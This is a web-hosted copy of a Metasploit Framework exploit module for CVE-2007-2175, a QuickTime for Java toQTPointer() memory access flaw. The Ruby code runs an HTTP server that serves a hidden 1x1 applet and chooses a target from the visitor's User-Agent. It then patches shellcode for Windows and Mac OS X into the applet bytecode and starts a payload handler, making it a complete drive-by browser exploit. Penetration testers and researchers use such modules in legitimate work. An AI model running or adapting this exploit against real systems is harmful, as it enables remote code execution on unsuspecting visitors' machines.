Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/qtjava_pointer.rb
31220 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  #

10
  # This module acts as an HTTP server

11
  #

12
  include Msf::Exploit::Remote::HttpServer::HTML

13


14
  def initialize(info = {})

15
    super(

16
      update_info(

17
        info,

18
        'Name' => 'Apple QTJava toQTPointer() Arbitrary Memory Access',

19
        'Description' => %q{

20
          This module exploits an arbitrary memory access vulnerability in the

21
          Quicktime for Java API provided with Quicktime 7.

22
        },

23
        'License' => MSF_LICENSE,

24
        'Author' => [

25
          'hdm',           # Original exploit for Mac OS X PPC / Win32

26
          'kf',            # Added support for Mac OS X X86

27
          'ddz'            # Discovered bug, provided tips

28
        ],

29
        'References' => [

30
          ['CVE', '2007-2175'],

31
          ['OSVDB', '34178'],

32
          ['BID', '23608'],

33
          ['ZDI', '07-023'],

34
        ],

35
        'Payload' => {

36
          'Space' => 1024,

37
          'BadChars' => ''

38
        },

39
        'Targets' => [

40
          #

41
          # Problem with generic payloads + regenerate_payload still :(

42
          #

43
          #					[ 'Quicktime 7 Automatic',

44
          #						{

45
          #							'Platform' => ['win', 'osx'],

46
          #							'Arch' => [ARCH_X86, ARCH_PPC]

47
          #						}

48
          #					],

49
          [

50
            'Quicktime 7 on Windows x86',

51
            {

52
              'Platform' => 'win',

53
              'Arch' => ARCH_X86

54
            }

55
          ],

56
          [

57
            'Quicktime 7 on Mac OS X PPC',

58
            {

59
              'Platform' => 'osx',

60
              'Arch' => ARCH_PPC

61
            }

62
          ],

63
          [

64
            'Quicktime 7 on Mac OS X x86',

65
            {

66
              'Platform' => 'osx',

67
              'Arch' => ARCH_X86

68
            }

69
          ],

70
        ],

71
        #			'DefaultTarget'  => 0,

72
        'DisclosureDate' => '2007-04-23',

73
        'Notes' => {

74
          'Reliability' => UNKNOWN_RELIABILITY,

75
          'Stability' => UNKNOWN_STABILITY,

76
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

77
        }

78
      )

79
    )

80
  end

81


82
  def exploit

83
    # load the class data

84
    path = File.join(Msf::Config.data_directory, 'exploits', 'QTJavaExploit.class')

85
    fd = File.open(path, 'rb')

86
    @class_data = fd.read(fd.stat.size)

87
    fd.close

88


89
    super

90
  end

91


92
  def on_request_uri(cli, req)

93
    # Create a cached mapping between IP and detected target

94
    @targetcache ||= {}

95
    @targetcache[cli.peerhost] ||= {}

96
    @targetcache[cli.peerhost][:update] = Time.now.to_i

97


98
    if (target.name =~ /Automatic/)

99
      case req.headers['User-Agent']

100
      when /Windows/i

101
        print_status('Choosing a Windows target')

102
        @targetcache[cli.peerhost][:target] = targets[1]

103
      when /PPC Mac OS X/i

104
        print_status('Choosing a Mac OS X PPC target')

105
        @targetcache[cli.peerhost][:target] = targets[2]

106
      when /Intel Mac OS X/i

107
        print_status('Choosing a Mac OS X x86 target')

108
        @targetcache[cli.peerhost][:target] = targets[3]

109
      end

110
    end

111


112
    # Clean the cache

113
    rmq = []

114
    @targetcache.each_key do |addr|

115
      if (Time.now.to_i > @targetcache[addr][:update] + 60)

116
        rmq.push addr

117
      end

118
    end

119


120
    rmq.each { |addr| @targetcache.delete(addr) }

121


122
    # Request processing

123


124
    if (!req.uri.match(/\.class$/i))

125


126
      # Redirect to the base directory so the applet code loads...

127
      if (!req.uri.match(%r{/$}))

128
        send_redirect(cli, get_resource + '/', '')

129
        return

130
      end

131


132
      # Display the applet loading HTML

133
      print_status('Sending HTML')

134
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })

135
      return

136
    end

137


138
    # Send the actual applet over

139
    print_status('Sending applet')

140
    send_response(cli, generate_applet(cli, req), { 'Content-Type' => 'application/octet-stream' })

141


142
    # Handle the payload

143
    handler(cli)

144
  end

145


146
  def generate_html

147
    return "<html><head></head><body><applet width='1' height='1' code='QTJavaExploit.class'></applet></body></html>"

148
  end

149


150
  def generate_applet(cli, _req)

151
    this_target = nil

152
    if (target.name =~ /Automatic/)

153
      if (@targetcache[cli.peerhost][:target])

154
        this_target = @targetcache[cli.peerhost][:target]

155
      else

156
        return ''

157
      end

158
    else

159
      this_target = target

160
    end

161


162
    # make a copy..

163
    data = @class_data.dup

164


165
    # 1 = OSX PPC, 2 = OSX X86, 3 = WIN X86

166
    idx_targ = data.index("\x03\x10\xcc\x54")

167


168
    # 1024 bytes for shellcode

169
    idx_code = data.index("\x03\x10\xf0\x54")

170


171
    # Handle Mac OS X PPC

172
    if (this_target.arch.include?(ARCH_PPC))

173
      tp = regenerate_payload(cli, 'osx', ARCH_PPC, this_target)

174
      data = patch_bytecode(idx_code, data, tp.encoded)

175
      data = patch_bytecode(idx_targ, data, "\x01")

176
    end

177


178
    # Handle Mac OS X x86 / Windows x86

179
    if (this_target.arch.include?(ARCH_X86))

180


181
      if (this_target.platform.platforms.include?(Msf::Module::Platform::Windows))

182
        tp = regenerate_payload(cli, 'win', ARCH_X86, this_target)

183
        data = patch_bytecode(idx_code, data, tp.encoded)

184
        data = patch_bytecode(idx_targ, data, "\x03")

185
      end

186


187
      if (this_target.platform.platforms.include?(Msf::Module::Platform::OSX))

188
        tp = regenerate_payload(cli, 'osx', ARCH_X86, this_target)

189
        data = patch_bytecode(idx_code, data, tp.encoded)

190
        data = patch_bytecode(idx_targ, data, "\x02")

191
      end

192
    end

193


194
    return data

195
  end

196


197
  def patch_bytecode(off, data, buff)

198
    cnt = 0

199
    off -= 1

200
    while (cnt < buff.length)

201
      cnt += 1

202
      off += 1 until ((data[off - 1] == 0x10 && data[off + 1] == 0x54))

203
      data[off] = buff[cnt - 1]

204
      off += 1

205
    end

206


207
    return data

208
  end

209


210
end

211


212